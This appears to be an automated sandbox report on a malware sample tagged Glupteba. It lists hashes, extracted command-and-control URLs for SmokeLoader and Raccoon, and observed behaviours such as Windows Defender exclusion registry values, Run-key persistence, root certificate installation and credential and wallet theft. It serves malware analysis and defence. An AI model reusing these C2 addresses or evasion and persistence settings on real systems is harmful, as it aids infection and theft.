glupteba | 57ad792c2b88e32003582f2b8a7eca4ff5a5fd13a691c797dec9cfa2c93a9d97

Resubmissions

13-02-2021 11:21

210213-2b1fqaz7v6 10

13-02-2021 11:07

210213-ad2a2ll2na 10

Analysis

max time kernel
64s
max time network
71s
platform
windows10_x64
resource
win10v20201028
submitted
13-02-2021 11:07

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

seed.exe
Size

163KB
MD5

d221e60151a0f4af38d7632a08645ee5
SHA1

2cb5e473289cd4e86a2c3b93bf4bc9b23c800fd1
SHA256

57ad792c2b88e32003582f2b8a7eca4ff5a5fd13a691c797dec9cfa2c93a9d97
SHA512

0833936b772400921d1c39b40b84fb6b789ba7a799236114f8a82bf957e7607818fa87aae7847e284c3c9576174c0fa3ccc7a5130c995dd4bd7d2adf4c2562b1

Malware Config

Extracted

Family

smokeloader

Version

2020

http://naritouzina.net/

http://nukaraguasleep.net/

http://notfortuaj.net/

http://natuturalistic.net/

http://zaniolofusa.net/

http://4zavr.com/upload/

http://zynds.com/upload/

http://atvua.com/upload/

http://detse.net/upload/

http://dsdett.com/upload/

http://dtabasee.com/upload/

http://yeronogles.monster/upload/

rc4.i32

Extracted

Family

raccoon

Botnet

17694a35d42ac97e2cd3ebd196db01b372cce1b0

Attributes

url4cnc
https://telete.in/o23felk0s

rc4.plain

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

raccoon

Botnet

027bc1bb9168079d5f7473eee9c05ee06589c305

Attributes

url4cnc
https://telete.in/jjbadb0y

rc4.plain

Extracted

Family

smokeloader

Version

2019

http://10022020newfolder1002002131-service1002.space/

http://10022020newfolder1002002231-service1002.space/

http://10022020newfolder3100231-service1002.space/

http://10022020newfolder1002002431-service1002.space/

http://10022020newfolder1002002531-service1002.space/

http://10022020newfolder33417-01242510022020.space/

http://10022020test125831-service1002012510022020.space/

http://10022020test136831-service1002012510022020.space/

http://10022020test147831-service1002012510022020.space/

http://10022020test146831-service1002012510022020.space/

http://10022020test134831-service1002012510022020.space/

http://10022020est213531-service100201242510022020.ru/

http://10022020yes1t3481-service1002012510022020.ru/

http://10022020test13561-service1002012510022020.su/

http://10022020test14781-service1002012510022020.info/

http://10022020test13461-service1002012510022020.net/

http://10022020test15671-service1002012510022020.tech/

http://10022020test12671-service1002012510022020.online/

http://10022020utest1341-service1002012510022020.ru/

http://10022020uest71-service100201dom2510022020.ru/

rc4.i32

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 3 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4820-136-0x0000000001510000-0x0000000001D12000-memory.dmp	family_glupteba
behavioral2/memory/4820-137-0x0000000000400000-0x0000000000C1B000-memory.dmp	family_glupteba
behavioral2/memory/4820-138-0x0000000000400000-0x0000000000C1B000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1832-71-0x0000000000A30000-0x0000000000A5E000-memory.dmp	family_redline
behavioral2/memory/1832-92-0x00000000024E0000-0x000000000250C000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs

Processes:

svchost.exe

description	pid	process	target process
PID 628 created 4820	628	svchost.exe	E83C.exe
PID 628 created 3540	628	svchost.exe	csrss.exe
PID 628 created 3540	628	svchost.exe	csrss.exe
PID 628 created 3540	628	svchost.exe	csrss.exe

Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112
Creates new service(s) 1 TTPs
persistence

New Service
T1050

Executes dropped EXE 27 IoCs

Processes:

B75F.exeB9F0.exeBE75.exeC54C.exeC6F3.exeB75F.exeCC05.exeD609.exeD984.exeupdatewin1.exeupdatewin2.exeE09A.exeoiizktkm.exeupdatewin.exeD984.exejfiag3g_gg.exe5.exeE83C.exeF29D.exejfiag3g_gg.exeE83C.execsrss.exepatch.exe3842.exe3B31.exe3842.exeSmartClock.exe

pid	process
4236	B75F.exe
3256	B9F0.exe
844	BE75.exe
1832	C54C.exe
1844	C6F3.exe
2104	B75F.exe
2764	CC05.exe
3956	D609.exe
4556	D984.exe
208	updatewin1.exe
1496	updatewin2.exe
4620	E09A.exe
4168	oiizktkm.exe
4156	updatewin.exe
4164	D984.exe
3808	jfiag3g_gg.exe
636	5.exe
4820	E83C.exe
4536	F29D.exe
2012	jfiag3g_gg.exe
4280	E83C.exe
3540	csrss.exe
4844	patch.exe
1556	3842.exe
2232	3B31.exe
732	3842.exe
196	SmartClock.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\D609.exe	upx
C:\Users\Admin\AppData\Local\Temp\D609.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
behavioral2/memory/732-189-0x0000000000400000-0x00000000047FC000-memory.dmp	upx
behavioral2/memory/732-194-0x0000000000400000-0x00000000047FC000-memory.dmp	upx

VMProtect packed file 1 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral2/memory/1560-218-0x0000000000210000-0x0000000000C29000-memory.dmp	vmprotect

Deletes itself 1 IoCs

Processes:

pid process

3028
Drops startup file 1 IoCs

Processes:

3842.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk 3842.exe

pid	process
3028

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk	3842.exe

Loads dropped DLL 18 IoCs

Processes:

seed.exeCC05.exeB9F0.exeD984.exeBE75.exe5.exepatch.exe

pid	process
4696	seed.exe
2764	CC05.exe
3256	B9F0.exe
3256	B9F0.exe
4164	D984.exe
844	BE75.exe
636	5.exe
636	5.exe
844	BE75.exe
844	BE75.exe
844	BE75.exe
844	BE75.exe
844	BE75.exe
844	BE75.exe
844	BE75.exe
4844	patch.exe
4844	patch.exe
4844	patch.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

1688 icacls.exe
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
1688	icacls.exe

Windows security modification 2 TTPs 10 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

E83C.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	E83C.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	E83C.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0"	E83C.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0"	E83C.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\BoldDew = "0"	E83C.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	E83C.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	E83C.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	E83C.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	E83C.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\E83C.exe = "0"	E83C.exe

themida 1 IoCs

Detects Themida, Advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral2/memory/1560-218-0x0000000000210000-0x0000000000C29000-memory.dmp	themida

Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

B75F.exeE09A.exeE83C.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\ad662da7-4660-43aa-a805-a243b109d15d\\B75F.exe\" --AutoStart"	B75F.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e"	E09A.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1985363256-3005190890-1182679451-1000\Software\Microsoft\Windows\CurrentVersion\Run\BoldDew = "\"C:\\Windows\\rss\\csrss.exe\""	E83C.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

D609.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA D609.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

18 api.2ip.ua
19 api.2ip.ua
46 api.2ip.ua
63 ip-api.com
Modifies boot configuration data using bcdedit 2 IoCs

Processes:

bcdedit.exebcdedit.exe

pid process

1164 bcdedit.exe
4656 bcdedit.exe
Drops file in System32 directory 1 IoCs

Processes:

svchost.exe

description ioc process

File created C:\Windows\SysWOW64\config\systemprofile:.repos svchost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	D609.exe

flow	ioc
18	api.2ip.ua
19	api.2ip.ua
46	api.2ip.ua
63	ip-api.com

pid	process
1164	bcdedit.exe
4656	bcdedit.exe

description	ioc	process
File created	C:\Windows\SysWOW64\config\systemprofile:.repos	svchost.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

D984.exeoiizktkm.exe3842.exe

description	pid	process	target process
PID 4556 set thread context of 4164	4556	D984.exe	D984.exe
PID 4168 set thread context of 3984	4168	oiizktkm.exe	svchost.exe
PID 1556 set thread context of 732	1556	3842.exe	3842.exe

Drops file in Windows directory 2 IoCs

Processes:

E83C.exe

description ioc process

File opened for modification C:\Windows\rss E83C.exe
File created C:\Windows\rss\csrss.exe E83C.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

1784 3956 WerFault.exe D609.exe

description	ioc	process
File opened for modification	C:\Windows\rss	E83C.exe
File created	C:\Windows\rss\csrss.exe	E83C.exe

pid	pid_target	process	target process
1784	3956	WerFault.exe	D609.exe

Checks SCSI registry key(s) 3 TTPs 9 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

seed.exeCC05.exeD984.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	seed.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	CC05.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	CC05.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	D984.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	D984.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	seed.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	seed.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	CC05.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	D984.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

B9F0.exe5.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	B9F0.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	B9F0.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	5.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	5.exe

Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

4720 schtasks.exe
3980 schtasks.exe
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

3400 timeout.exe
1240 timeout.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

3324 taskkill.exe
4244 taskkill.exe

pid	process
4720	schtasks.exe
3980	schtasks.exe

pid	process
3400	timeout.exe
1240	timeout.exe

pid	process
3324	taskkill.exe
4244	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

csrss.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2062 = "North Korea Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-461 = "Afghanistan Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2631 = "Norfolk Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1931 = "Russia TZ 11 Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2371 = "Easter Island Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2512 = "Lord Howe Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1932 = "Russia TZ 11 Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1892 = "Russia TZ 3 Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1802 = "Line Islands Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-831 = "SA Eastern Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2341 = "Haiti Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-282 = "Central Europe Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2592 = "Tocantins Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-104 = "Central Brazilian Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-52 = "Greenland Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	csrss.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

B75F.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	B75F.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fa